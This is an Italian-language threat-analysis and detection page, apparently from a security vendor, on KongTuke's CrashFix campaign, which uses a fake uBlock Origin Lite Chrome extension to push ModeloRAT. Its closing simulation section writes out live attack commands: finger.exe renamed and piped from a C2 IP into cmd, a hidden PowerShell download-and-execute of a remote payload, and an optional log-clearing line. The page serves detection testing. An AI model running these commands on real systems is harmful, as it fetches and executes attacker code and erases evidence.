Segui
Detection stack
- AIDR
- Alert
- ETL
- Query
Riepilogo
KongTuke ha distribuito un’estensione maligna di Chrome, NexShield, imitando uBlock Origin Lite. Una volta installata, visualizza un avviso di sicurezza “CrashFix” per simulare un incidente di sicurezza del browser legittimo, blocca il browser e costringe l’utente a eseguire un comando PowerShell malevolo copiato negli appunti. La campagna distribuisce un RAT in Python, ModeloRAT, su sistemi collegati al dominio e una catena PowerShell a piĂą stadi su host stand-alone.
Indagine
Gli analisti di Huntress hanno esaminato il codice dell’estensione, collegato il comando e controllo a nexsnield.com e effettuato il reverse engineering dei payload. Hanno osservato un abuso di finger.exe come LOLBin per recuperare le istruzioni degli attaccanti, oltre a un DGA che genera domini .top. Per gli ambienti su dominio, i ricercatori hanno identificato un impianto Python cifrato RC4 che persiste tramite la chiave HKCU Run. Altre tecniche includevano controlli anti-analisi, Bypass di AMSI, e tattiche di esaurimento delle risorse intese a indurre gli utenti a conformarsi rapidamente.
Mitigazione
Bloccare l’ID dell’estensione di Chrome e monitorare le estensioni sconosciute che impersonano noti blocca-pubblicitĂ . Rilevare il beaconing verso nexsnield.com, gli IP C2 e domini prodotti dal DGA. Applicare il controllo dell’esecuzione per limitare l’uso di LOLBin (incluso finger.exe) e allertare su valori Run-key sospetti, specialmente nomi progettati per somigliare a software ampiamente utilizzati.
Risposta
Allertare sulle installazioni di estensioni relative a NexShield e correlare con connessioni in uscita verso l’infrastruttura C2 e DGA identificata. Isolare gli host colpiti e raccogliere artefatti delle estensioni, chiavi di registro di Run, task schedulati e file scaricati. Rimuovere la persistenza di ModeloRAT, eradicare i componenti degli stadi PowerShell e rimedialee validare l’endpoint.
graph TB %% Class definitions classDef action fill:#FFEEAA classDef tool fill:#99CCFF classDef malware fill:#FF9999 classDef process fill:#CCFFCC classDef persistence fill:#D9D9D9 classDef operator fill:#FFCC66 content_injection[“<b>Azione</b> – <b>T1659 Iniezione di contenuti</b><br/>Una pubblicitĂ malevola reindirizza la vittima verso una falsa pagina del Chrome Web Store che offre un’estensione dannosa”] class content_injection action software_extension[“<b>Azione</b> – <b>T1176 Estensioni software</b><br/>Un’estensione dannosa che si spaccia per uBlock Origin Lite viene installata nel browser”] class software_extension action extension_nexshield[“<b>Strumento</b> – <b>Nome</b>: NexShield (estensione Chrome dannosa)<br/><b>Descrizione</b>: Fornisce persistenza ed esegue ulteriore logica malevola”] class extension_nexshield tool user_execution[“<b>Azione</b> – <b>T1204.004 Esecuzione dell’utente</b><br/>L’estensione copia un comando PowerShell negli appunti e la vittima lo esegue tramite Win+R”] class user_execution action powershell_process[“<b>Processo</b> – <b>T1059.001 PowerShell</b><br/>Esegue un comando PowerShell che scarica payload aggiuntivi”] class powershell_process process cmd_process[“<b>Processo</b> – <b>T1059.003 Prompt dei comandi di Windows</b><br/>PowerShell invoca cmd.exe per eseguire ulteriori fasi”] class cmd_process process sandbox_evasion[“<b>Azione</b> – <b>T1497.002 Evasione da virtualizzazione/sandbox</b><br/>Il payload esegue controlli estesi su VM, sandbox e strumenti di analisi”] class sandbox_evasion action dos_exhaustion[“<b>Azione</b> – <b>T1499.003 Denial of Service dell’endpoint</b><br/>Crea miliardi di porte di runtime di Chrome per esaurire CPU e memoria causando il crash del browser”] class dos_exhaustion action event_trigger[“<b>Azione</b> – <b>T1546 Esecuzione attivata da evento</b><br/>Utilizza l’API Chrome Alarms per ritardare le azioni malevole di 60 minuti e ripeterle ogni 10 minuti”] class event_trigger action dead_drop[“<b>Azione</b> – <b>T1102.001 Web Service Dead Drop Resolver</b><br/>Contatta domini DGA generati dinamicamente per recuperare ulteriori stadi”] class dead_drop action dga_resolution[“<b>Azione</b> – <b>T1568 Risoluzione dinamica</b><br/>L’algoritmo di generazione dei domini produce domini a rotazione settimanale per il C2”] class dga_resolution action bidirectional_comm[“<b>Azione</b> – <b>T1102.002 Comunicazione bidirezionale tramite servizi web</b><br/>ModeloRAT scambia comandi e risposte cifrate tramite HTTP”] class bidirectional_comm action oneway_comm[“<b>Azione</b> – <b>T1102.003 Comunicazione unidirezionale tramite servizi web</b><br/>Invia telemetria e dati di installazione/aggiornamento a un server controllato dall’attaccante”] class oneway_comm action encrypted_rc4[“<b>Azione</b> – <b>T1573.001 Canale cifrato</b><br/>Il traffico C2 è cifrato con crittografia simmetrica RC4”] class encrypted_rc4 action obfuscation[“<b>Azione</b> – <b>T1027 File o informazioni offuscate</b><br/>I payload sono stratificati con codifica Base64, XOR e cifratura AES”] class obfuscation action stripped_payload[“<b>Azione</b> – <b>T1027.008 Payload depurati</b><br/>I payload vengono depurati e codificati per eludere l’analisi”] class stripped_payload action embedded_payload[“<b>Azione</b> – <b>T1027.009 Payload incorporati</b><br/>I payload cifrati vengono caricati direttamente in memoria”] class embedded_payload action appcert_dll[“<b>Azione</b> – <b>T1546.009 Esecuzione attivata da evento: AppCert DLL</b><br/>Il ciclo DoS sfrutta le porte runtime di Chrome in modo analogo alla tecnica AppCert DLL”] class appcert_dll action remote_access_tool[“<b>Malware</b> – <b>T1219 Strumenti di accesso remoto</b><br/>ModeloRAT fornisce capacitĂ complete di accesso remoto”] class remote_access_tool malware persistence_run[“<b>Azione</b> – <b>T1554 Compromissione dei binari software dell’host</b><br/>La chiave HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run avvia pythonw.exe per la persistenza”] class persistence_run persistence exec_guardrail[“<b>Azione</b> – <b>T1480.002 Guardrail di esecuzione</b><br/>Verifica esecuzioni precedenti tramite beacon UUID per evitare infezioni duplicate”] class exec_guardrail action content_injection –>|leads_to| software_extension software_extension –>|installs| extension_nexshield extension_nexshield –>|provides_persistence| persistence_run extension_nexshield –>|copies_command| user_execution user_execution –>|triggers| powershell_process powershell_process –>|launches| cmd_process powershell_process –>|performs| sandbox_evasion sandbox_evasion –>|allows| powershell_process powershell_process –>|creates| dos_exhaustion dos_exhaustion –>|uses| appcert_dll extension_nexshield –>|sets| event_trigger event_trigger –>|delays| powershell_process powershell_process –>|contacts| dead_drop dead_drop –>|uses| dga_resolution dga_resolution –>|provides| bidirectional_comm bidirectional_comm –>|encrypts_with| encrypted_rc4 bidirectional_comm –>|exchanges_with| remote_access_tool oneway_comm –>|sends_to| encrypted_rc4 powershell_process –>|obfuscates_using| obfuscation obfuscation –>|includes| stripped_payload obfuscation –>|includes| embedded_payload remote_access_tool –>|communicates_via| bidirectional_comm remote_access_tool –>|sends_telemetry| oneway_comm persistence_run –>|creates| exec_guardrail exec_guardrail –>|prevents| persistence_run
Flusso di attacco
Rilevamenti
Chiamata a Metodi .NET Sospetti tramite PowerShell (via powershell)
Visualizza
Uso Sospetto di CURL (via cmdline)
Visualizza
Nome Breve del File (via cmdline)
Visualizza
Possibile Operazione Manuale o di Scripting Eseguita in Cartelle Insolite (via cmdline)
Visualizza
Stringhe PowerShell Sospette (via powershell)
Visualizza
Chiamata a Funzioni API di Windows Sospette da PowerShell (via powershell)
Visualizza
Possibili Punti di Persistenza [ASEPs – Software/NTUSER Hive] (via registry_event)
Visualizza
Un Archivio è Stato Estratto in una Directory Sospetta con PowerShell (via powershell)
Visualizza
Esecuzione di Python da Cartelle Sospette (via cmdline)
Visualizza
Possibili Indicatori di Offuscamento PowerShell (via powershell)
Visualizza
Possibile Enumerazione del Sistema (via cmdline)
Visualizza
Download o Upload tramite PowerShell (via cmdline)
Visualizza
IOCs (SourceIP) per rilevare: Analisi di CrashFix: Il Nuovo Giocattolo di KongTuke
Visualizza
IOCs (HashSha256) per rilevare: Analisi di CrashFix: Il Nuovo Giocattolo di KongTuke
Visualizza
IOCs (DestinationIP) per rilevare: Analisi di CrashFix: Il Nuovo Giocattolo di KongTuke
Visualizza
IOCs (Email) per rilevare: Analisi di CrashFix: Il Nuovo Giocattolo di KongTuke
Visualizza
Rileva l’Esecuzione di Comandi Malevoli di KongTuke CrashFix [Creazione Processo di Windows]
Visualizza
Rilevamento del Bypass di AMSI e Rimozione di Evidenze tramite PowerShell [Windows Powershell]
Visualizza
Esecuzione di Simulazione
Prerequisito: Il Controllo Prevolo di Telemetria & Baseline deve essere passato.
Motivazione: Questa sezione dettaglia l’esecuzione precisa della tecnica avversaria (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente i TTP identificati e mirano a generare la telemetria esatta prevista dalla logica di rilevamento.
-
Narrativa dell’Attacco e Comandi:
L’avversario prima copia il legittimofinger.exebinario nella directory temporanea, lo rinomina comect.exe, e poi utilizza una catena nidificatacmd /cper invocare il binario copiato con un argomento elaborato che contatta un server remoto C2 (199.217.98.108). Il binario trasmette il payload al prompt dei comandi, che viene quindi indirizzato in un secondocmdcmdInvoke‑WebRequeste lo esegue immediatamente coniex. Tutti i passaggi sono eseguiti con un’interfaccia utente minima (/min) per evitare il rilevamento da parte dell’utente.1. Copia finger.exe → %TEMP%ct.exe 2. Esegui: cmd /c start "" /min cmd /c "copy %windir%system32finger.exe %temp%ct.exe&%temp%ct.exe confirm@199.217.98.108|cmd" 3. Download & esecuzione di payload secondari con PowerShell: powershell -NoProfile -WindowStyle Hidden -Command "iex (Invoke-WebRequest -Uri 'http://199.217.98.108/payload.ps1' -UseBasicParsing).Content" -
Script di Test di Regressione: Lo script qui sotto riproduce l’intera catena di attacco su una macchina di test Windows. Eseguire in una sessione PowerShell elevata.
#------------------------------------------------- # Esecuzione di Comandi Malevoli KongTuke CrashFix #------------------------------------------------- # 1. Distribuire il LOLBin (finger.exe) in %TEMP% come ct.exe $fingerPath = "$env:windirsystem32finger.exe" $tempExe = "$env:TEMPct.exe" Copy-Item -Path $fingerPath -Destination $tempExe -Force # 2. Eseguire la catena cmd malevola (corrisponde alla regola Sigma) $maliciousCmd = 'cmd /c start "" /min cmd /c "copy %windir%system32finger.exe %temp%ct.exe&%temp%ct.exe confirm@199.217.98.108|cmd"' Start-Process -FilePath "cmd.exe" -ArgumentList "/c $maliciousCmd" -WindowStyle Hidden # 3. Download web tramite PowerShell ed esecuzione del payload secondario $payloadUrl = 'http://199.217.98.108/payload.ps1' $psCommand = "iex (Invoke-WebRequest -Uri `'$payloadUrl`' -UseBasicParsing).Content" Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -Command `$psCommand`" -WindowStyle Hidden #------------------------------------------------- -
Comandi di Pulizia: Rimuovere gli artefatti e terminare eventuali processi residui creati dal test.
# Elimina il ct.exe copiato Remove-Item -Path "$env:TEMPct.exe" -ErrorAction SilentlyContinue # Uccidi eventuali processi cmd.exe o powershell.exe rimasti avviati dal test (filtra per riga di comando specifica) Get-WmiObject Win32_Process | Where-Object { $_.CommandLine -match 'finger.exe|199.217.98.108' } | ForEach-Object { $_.Terminate() } # Opzionale: cancella Log Eventi se necessario per ripetibilitĂ # wevlutil cl Security